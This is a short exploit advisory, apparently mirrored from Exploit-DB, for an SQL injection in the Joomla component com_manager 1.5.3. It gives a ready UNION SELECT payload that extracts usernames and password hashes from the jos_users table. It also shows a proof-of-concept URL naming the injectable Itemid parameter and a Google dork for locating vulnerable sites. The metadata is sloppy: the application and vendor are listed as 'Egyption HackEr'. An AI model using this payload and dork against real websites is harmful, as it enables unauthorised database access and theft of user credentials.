Joomla! Component com_manager 1.5.3 – ‘id’ SQL Injection

  • 作者: Islam DefenDers Mr.HaMaDa
    日期: 2010-04-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12257/
  • -----------------------------------------------------------------------
     Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability
    -----------------------------------------------------------------------
    Author: Islam DefenDers Mr.HaMaDa
    Site: http://MiXaTy.com
    Date: April, 15-2010
    Location: Egyption HackEr
    ----------------------------------------------------------------
    
    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Application : Egyption HackEr
    Vendor: http://MixaTy.com
    Version : 1.5.3 Other versions may also be affected
    Google Dork : inurl:com_manager
    
    Intellectual Property allows independent real estate agents, brokers, or property
    management companies to upload and maintain property listings for sale, for rent and for lease.
    Upload photos, add categories, sub-categories, agent profiles, company profiles.
    Search with an advanced Google Map-Ajax-based map interface. Allow users to save and
    manage favorite properties. Quickly customize colors, filters, galleries and more!
    ----------------------------------------------------------------
    
    Exploitz:
    ~~~~~~~
    
    -999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
    
    
    SQLi p0c:
    ~~~~~~~
    
    http://127.0.0.1/[path]/index.php?option=com_manager&view=flight&Itemid=[SQL]
    ----------------------------------------------------------------
     HaMaDa SCoOoRPioN - ViRuSMaN - DR.BaHy - Mixaty TeaM - Islam DefenDers TeaM
    
    ----------------------------------------------------------------
    Contact:
    ~~~~
    
    Site: www.mixaty.com
    
    email: hackereg@hotmail.com